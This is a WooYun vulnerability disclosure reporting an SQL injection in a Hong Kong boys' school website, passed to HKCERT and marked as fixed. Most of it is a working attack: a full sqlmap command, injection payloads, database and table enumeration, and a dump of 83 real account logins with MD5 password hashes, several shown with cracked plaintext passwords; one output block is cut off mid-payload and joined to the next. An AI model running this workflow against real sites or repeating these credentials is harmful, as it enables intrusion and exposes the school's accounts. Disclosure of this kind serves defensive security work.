当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149049

漏洞标题:香港拔萃男书院某处存在sql插入漏洞(可获得用户登录密码)

相关厂商:hkcert香港互联网应急协调中心

漏洞作者: 路人甲

提交时间:2015-10-25 12:37

修复时间:2015-10-29 15:03

公开时间:2015-10-29 15:03

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态: 已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-25: 细节已通知厂商并且等待厂商处理中
2015-10-28: 厂商已经确认,细节仅向厂商公开
2015-10-29: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

香港拔萃男书院某处存在sql插入漏洞(可获得用户登录密码)

详细说明:

测试地址:http://**.**.**.**.hk/furtherstudies/index.php?parentid=5&sid=11

python sqlmap.py -u "http://**.**.**.**.hk/furtherstudies/index.php?parentid=5&sid=11" -p parentid --technique=BE --random-agent -D swims -T login -C login,passwd --dump --threads=10

漏洞证明:

---
Parameter: parentid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: parentid=5 AND 4092=4092&sid=11
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sid=11
---
web server operating system: Linux SuSE 10.2
web application technology: Apache 2.2.3, PHP 5.2.5
back-end DBMS: MySQL 5.0
current user:    'swims_view@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'swims_view'@'localhost'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: parentid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: parentid=5 AND 4092=4092&sid=11
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sid=11
---
web server operating system: Linux SuSE 10.2
web application technology: Apache 2.2.3, PHP 5.2.5
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] swims
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: parentid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: parentid=5 AND 4092=4092&sid=11
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sid=11
---
web server operating system: Linux SuSE 10.2
web application technology: Apache 2.2.3, PHP 5.2.5
back-end DBMS: MySQL 5.0
Database: swims
[5 tables]
+-----------+
| section   |
| content   |
| log       |
| login     |
| templates |
+-----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: parentid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: parentid=5 AND 4092=4092&sid=11
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sid=11
---
web server operating system: Linux SuSE 10.2
web application technology: Apache 2.2.3, PHP 5.2.5
back-end DBMS: MySQL 5.0
Database: swims
Table: login
[9 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| session    | varchar(32) |
| ip         | varchar(15) |
| lastip     | varchar(15) |
| laststatus | int(1)      |
| lasttime   | int(11)     |
| login      | varchar(32) |
| passwd     | varchar(32) |
| slevel     | int(1)      |
| type       | int(1)      |
+------------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: parentid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: parentid=5 AND 4092=4092&sid=11
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARsqlmap resumed the following injection point(s) from stored session:
---
Parameter: parentid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: parentid=5 AND 4092=4092&sid=11
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sid=11
---
web server operating system: Linux SuSE 10.2
web application technology: Apache 2.2.3, PHP 5.2.5
back-end DBMS: MySQL 5.0
Database: swims
Table: login
[83 entries]
+-------------------+----------------------------------------------+
| login             | passwd                                       |
+-------------------+----------------------------------------------+
| 10km              | 9aa2eb58d61546c12062cd3f9456a5d1             |
| aa                | d8578edf8458ce06fbc5bb76a58c5ca4 (qwerty)    |
| admissionnewsclip | 8118c2d628b8366ae3f24a6bcac8c16f             |
| art               | 002d25e087bb1a7f1dc252ff5e48f005             |
| astronomy         | c3f8326e6f0cc970cc71e61358e19a81             |
| av                | 1449a8ddaf572b9301467467e6b6339e             |
| aviation          | 15cc4b82249c7b030de7ea16a3216a1e             |
| boarding          | 2bb53bb81d373a2b4f072e01e655085f             |
| bridge            | 8d2f6b5e556ad014146a93a1d8b9ab23             |
| bs                | 4e333762c9f4a75e6bf8958ea06411aa             |
| bsd               | 192de2b21c647bf17b7f5abb7d5383f7             |
| cdrama            | cdc9ae8277415733ad81ddc6a07981c2             |
| cf                | 5ce73527feaadc85e2476af0ecc4328d (jesus!)    |
| chem              | f08f90ffbf587b05e26f17616aea73ee             |
| chess             | 46e44aa0bc21d8a826d79344df38be4b (123qweASD) |
| chihist           | 21ef6578156b72a3437d9a0a12bd6586             |
| chinese           | f679585e513e53560c45c3eb3d8f0f1a             |
| chist             | a356eab069e616150d8e6ecb916b54b8             |
| christian_fellow  | 5ce73527feaadc85e2476af0ecc4328d (jesus!)    |
| civic             | c89ea82733108fc18e313df856c06c69             |
| clit              | 53b69cccf5cb56ddf840a87777454367             |
| cs                | 94b6c955e00906fb624054440a30b316             |
| dbsfoundation     | 8dbe46fcc067742bd8b714054d1f9d50             |
| dbspta            | 95de7d8c91d5e8bfb8d44acc00b6a6b0             |
| discipline        | 83d270632c591d1a2d03bd46389c469b             |
| dse               | b4c05802f985c1afabc09bb798241d40             |
| dt                | cf4cdc9a5e4d358dd07ba2b8393a2488             |
| ecs               | 473db90092021f87fa0a63f9ef425c1b             |
| english           | e13640f4976a0907fc7c1d234ff6494d             |
| englit            | 1ac1d1b636cc832803ed530293385daf             |
| es                | 30170728ebb8b4d60c2c9b812ac1b8dc             |
| film              | 464abfcded00e155ad5889d869db374e             |
| fitness           | 7f2b344bd50be2eb0f1b42626bd09834             |
| french            | d9cc313b5aa1f565080147bc2ca8499a             |
| frenchclub        | 22f50be93526facc4ca1fc278ee1c179 (123666)    |
| furtherstudies    | c352c4e5fad78f8a6c46a5a3d57861f2             |
| geog              | 2724f752f24063e574c81c348a8d1796             |
| german            | d1449c30287f1c2bb4b3ec73d295c970             |
| gifted            | d50421f925321162959c0d316dbcd869             |
| golf              | 9adf5339387a8d22144f446a92825639             |
| hist              | 60b80a112b377d52354a876528866b10             |
| history           | 41fc5fb9a61826dfb8e15f1282e87683             |
| ib                | 089cc6d2ee24461120321e10b5726b86             |
| ib2               | 0b64ae66d9cb7d486112d8ae4401b299             |
| interschoolsports | 8c5d801f845c0b895e57daf839f8bafa             |
| itwg              | e6636644175f9929297189ab8cc07bbf             |
| japan             | 51f6f8fe03a390d3de50ad49913d4b66 (123459)    |
| liberal           | ede4c8eecb58a906d62f4b34570213b9             |
| mac               | ae1984395283212c7e80f957c33e0f2b             |
| magic             | 58d9fc4c07b9d40af63d927cfbc14e28             |
| martial           | b69590c12f099d6cc07886f338d05620             |
| maths             | 5ae3295dd469f90a9f10c8f1a6958459             |
| mgeog             | 12f3c96e3c90308dd19e2905aeee15e9             |
| mmusic            | 18ff6fa7f4eca64df1b3ffc80ee42518             |
| music             | 1a4d4ac1a856d940d06f8acf221cea64             |
| nss               | 8cd211b9d2d45c858d258bbaac786a21             |
| ocean             | 5c8e51474d56c3c9a8d66f5c322f837b             |
| oi                | 4f4800afe4fc855934925fe9fc34a540             |
| orient            | 912bd9472e011e911020fe6cc0e5d4fd             |
| parents           | db34ea86820b356e164ee3c2177a2f30             |
| pe                | 5a8dd3ad0756a93ded72b823b19dd877 (hello!)    |
| phil              | bad2d158a6b400f2e239b148c52f50ed             |
| phototeam         | b7ed6efbb82513e00d32677557c92367             |
| psych             | 3c4b15a545de56b7625e8a615ee56280             |
| puto              | 440f81760c3f988302f8aad3956458de             |
| puzzle            | 016b51b6479c0a46c8e9f293ac930a79             |
| quintak           | ef58bcce3670da846d4c9c5de9f715ec             |
| sc                | 0875daa9eebf3080701ec100e3b6052f             |
| science           | 8b0dc2e34844337434b8475108a490ab (hohoho)    |
| skygarden         | f35b2e980682264dc65a1eb332cfddee             |
| smath             | a83862769f78fffb512bc9283007ef67 (maxmax)    |
| social            | 1b7037d2fece1fb637abe26d058f4a8a (social123) |
| socialsoc         | 9f9fb8fa8c9308d1a84db37317c34acf             |
| sports            | 5a8dd3ad0756a93ded72b823b19dd877 (hello!)    |
| sportsfed         | ede476f066abde060a857477d38ef47e             |
| stamp             | c1c824cfd0c5499563b055525035c137 (marcopolo) |
| swim              | f6ead7bf3faa8ad4be6310874328ad80             |
| swimming          | 862cdea78c758ed6d664cc6af403b4a9             |
| tennis            | 7daacea5f373b4c1c054158b126d317f (dennis)    |
| test              | 05a671c66aefea124cc08b76ea6d30bb (testtest)  |
| testsite          | 16d7a4fca7442dda3ad93c9a726597e4 (test1234)  |
| varts             | 079dec77a9ae897a8dcc0d9f1a6c9cdf             |
| waterpolo         | 397315245557848ce2a4207139d81827             |
+-------------------+----------------------------------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-28 12:00

厂商回复:

已將事件通知有關機構

最新状态:

2015-10-29:相關機構回報已修復漏洞